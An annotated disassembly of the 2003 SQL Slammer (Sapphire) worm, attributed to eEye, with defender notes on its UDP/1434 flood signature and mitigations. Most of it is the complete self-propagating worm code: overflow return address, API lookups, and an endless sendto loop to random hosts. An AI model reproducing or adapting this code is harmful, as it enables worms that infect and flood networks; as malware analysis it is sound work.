2003蠕虫王反汇编代码

;SAPPHIRE WORM CODE DISASSEMBLED
;eEye Digital Security: January 25, 2003
;
;-----------------------------------------------------------------------
; Annotated disassembly of the Sapphire / "SQL Slammer" payload (2003).
; Syntax: Intel (IDA/MASM style), 32-bit x86, Windows, stdcall imports.
; The code runs on the stack after a buffer overflow in the SQL Server
; Resolution Service (UDP/1434). Every API is reached through hard-coded
; addresses into sqlsort.dll (one jmp esp gadget and three IAT slots), so
; it only works when that module is loaded at the base these constants
; assume - there is no real import resolution.
;
; Stack layout, relative to ebp (set by the mov ebp,esp below):
;   ebp+3            first byte (04h) of the datagram the worm re-sends
;   ebp-10h          "kernel32.dll"      ebp-20h  "GetTickCount"
;   ebp-2Ch          "ws2_32.dll"        ebp-34h  "socket"
;   ebp-3Ch          "sendto"            ebp-40h  ws2_32 base address
;   ebp-50h..ebp-41h sockaddr_in (family/port at -50h, sin_addr at -4Ch)
;   ebp-54h          UDP socket handle
; Register roles once setup is done: esi = sendto, ebx = PRNG increment.
;
; Defender notes: the send loop at PRND has no exit condition and no
; delay, so an infected host emits a continuous flood of 376-byte (178h)
; UDP datagrams to port 1434 at pseudo-random destinations - that flood
; is the network signature; blocking UDP/1434 at the perimeter and
; patching the Resolution Service are the mitigations.
;-----------------------------------------------------------------------


        push    42B0C9DCh       ; [RET] sqlsort.dll -> jmp esp: the overwritten
                                ; return address; control lands on the stack
                                ; right after it, i.e. on the next instruction
                mov     eax, 1010101h   ; Rebuild the working buffer: the payload
                                        ; buffer gets corrupted between the overflow
                                        ; and the moment this code runs, so the code
                                        ; pushes its own copy of everything it needs.
                xor     ecx, ecx
                mov     cl, 18h         ; ecx = 24 dword pushes (no NUL byte in the opcode)

FIXUP:                                  ; push 01010101h 24 times = 96 bytes of filler
                push    eax
                loop    FIXUP           ; ecx == 0 on exit; reused as NUL terminator below
                xor     eax, 5010101h   ; eax = 04000000h -> in memory 00 00 00 04, so the
                push    eax             ; byte at ebp+3 is 04h (first byte of the packet sent)
                mov     ebp, esp        ; ebp = frame base for every [ebp-xx] below
                push    ecx             ; NUL terminator for "kernel32.dll"
                push    6C6C642Eh       ; ".dll"  (strings are pushed last dword first;
                push    32336C65h       ; "el32"   little-endian, so they read forward)
                push    6E72656Bh       ; "kern" -> "kernel32.dll" at ebp-10h
                push    ecx             ; NUL terminator for "GetTickCount"
                push    746E756Fh       ; "ount"
                push    436B6369h       ; "ickC"
                push    54746547h       ; "GetT" -> "GetTickCount" at ebp-20h
                mov     cx, 6C6Ch       ; ecx = "ll\0\0" (upper half of ecx still zero)
                push    ecx
                push    642E3233h       ; "32.d"
                push    5F327377h       ; "ws2_" -> "ws2_32.dll" at ebp-2Ch
                mov     cx, 7465h       ; "et\0\0"
                push    ecx
                push    6B636F73h       ; "sock" -> "socket" at ebp-34h
                mov     cx, 6F74h       ; "to\0\0"
                push    ecx
                push    646E6573h       ; "send" -> "sendto" at ebp-3Ch
                mov     esi, 42AE1018h  ; sqlsort.dll IAT slot holding LoadLibraryA
                lea     eax, [ebp-2Ch]  ; &"ws2_32.dll"
                push    eax
                call    dword ptr [esi] ; LoadLibraryA("ws2_32.dll")
                push    eax             ; ebp-40h = ws2_32 base address
                lea     eax, [ebp-20h]  ; &"GetTickCount" (2nd arg of GetProcAddress below)
                push    eax
                lea     eax, [ebp-10h]  ; &"kernel32.dll"
                push    eax
                call    dword ptr [esi] ; LoadLibraryA("kernel32.dll")
                push    eax             ; kernel32 base (1st arg of GetProcAddress)
                mov     esi, 42AE1010h  ; sqlsort.dll IAT slot expected to hold GetProcAddress
                mov     ebx, [esi]      ; ebx = imported function address (also feeds the PRNG below)
                mov     eax, [ebx]      ; first 4 code bytes of that function
                cmp     eax, 51EC8B55h  ; 55 8B EC 51 = push ebp / mov ebp,esp / push ecx
                jz      short VALID_GP  ; Entry-point fingerprint check for GetProcAddress; if it
                                        ; fails, fall back to a second IAT slot whose target is
                                        ; GetProcAddress in another DLL version. Undetermined
                                        ; which DLL versions this succeeds on: with no reliable
                                        ; importing the code may not work across all versions.
                mov     esi, 42AE101Ch  ; IAT entry -> 77EA094C (fallback GetProcAddress)

VALID_GP:                               ; esi -> IAT slot of GetProcAddress
                call    dword ptr [esi] ; GetProcAddress(kernel32, "GetTickCount")
                call    eax             ; GetTickCount(): eax = ms since boot, the PRNG seed
                xor     ecx, ecx
                push    ecx             ; sin_zero (8 zero bytes)
                push    ecx
                push    eax             ; ebp-4Ch = sin_addr, seeded with the tick count
                xor     ecx, 9B040103h  ; two XORs build 9A050002h (presumably to keep the
                xor     ecx, 1010101h   ; overflow string free of NUL bytes)
                push    ecx             ; 9A050002h = sin_port 059Ah (1434, network order) / sin_family 2 (AF_INET)
                lea     eax, [ebp-34h]  ; &"socket"
                push    eax
                mov     eax, [ebp-40h]  ; ws2_32 base address
                push    eax
                call    dword ptr [esi] ; GetProcAddress(ws2_32, "socket")
                push    11h             ; IPPROTO_UDP
                push    2               ; SOCK_DGRAM
                push    2               ; AF_INET
                call    eax             ; socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)
                push    eax             ; ebp-54h = socket handle (return value never checked)
                lea     eax, [ebp-3Ch]  ; &"sendto"
                push    eax
                mov     eax, [ebp-40h]  ; ws2_32 base address
                push    eax
                call    dword ptr [esi] ; GetProcAddress(ws2_32, "sendto")
                mov     esi, eax        ; esi = sendto, kept across the whole loop
                or      ebx, ebx        ; only sets flags: ebx still holds the function address
                xor     ebx, 0FFD9613Ch ; read from the IAT above, now XORed with a constant.
                                        ; 0FFD9613Ch is the bitwise complement of 269EC3h
                                        ; (2531011, the CRT rand() increment); as written the
                                        ; increment depends on the DLL load address instead -
                                        ; NOTE(review): consistent with the worm's known poor
                                        ; coverage of the address space, TODO confirm.

PRND:                                   ; x = [ebp-4Ch]; x' = 214013*x + ebx (LCG step)
                mov     eax, [ebp-4Ch]  ; Pseudo Random Algorithm Start: eax = x
                lea     ecx, [eax+eax*2] ; ecx = 3x
                lea     edx, [eax+ecx*4] ; edx = 13x
                shl     edx, 4          ; edx = 208x
                add     edx, eax        ; edx = 209x
                shl     edx, 8          ; edx = 53504x
                sub     edx, eax        ; edx = 53503x
                lea     eax, [eax+edx*4] ; eax = 214013x (the CRT rand() multiplier)
                add     eax, ebx        ; Pseudo Random Algorithm End: + increment (ebx)
                mov     [ebp-4Ch], eax  ; store back as sin_addr: the raw PRNG state, in whatever
                                        ; byte order it has, becomes the next destination IP
                push    10h             ; tolen = sizeof(sockaddr_in)
                lea     eax, [ebp-50h]  ; to = &sockaddr_in
                push    eax
                xor     ecx, ecx
                push    ecx             ; flags = 0
                xor     cx, 178h        ; len = 178h = 376 bytes
                push    ecx
                lea     eax, [ebp+3]    ; buf = 04h byte + filler + this code: a copy of itself
                push    eax
                mov     eax, [ebp-54h]  ; s = socket handle
                push    eax
                call    esi             ; sendto(s, buf, 376, 0, &sa, 16); result ignored
                jmp     short PRND      ; Jump back to Pseudo Random Algorithm Start: no exit
                                        ; and no delay, so the loop saturates the host's uplink
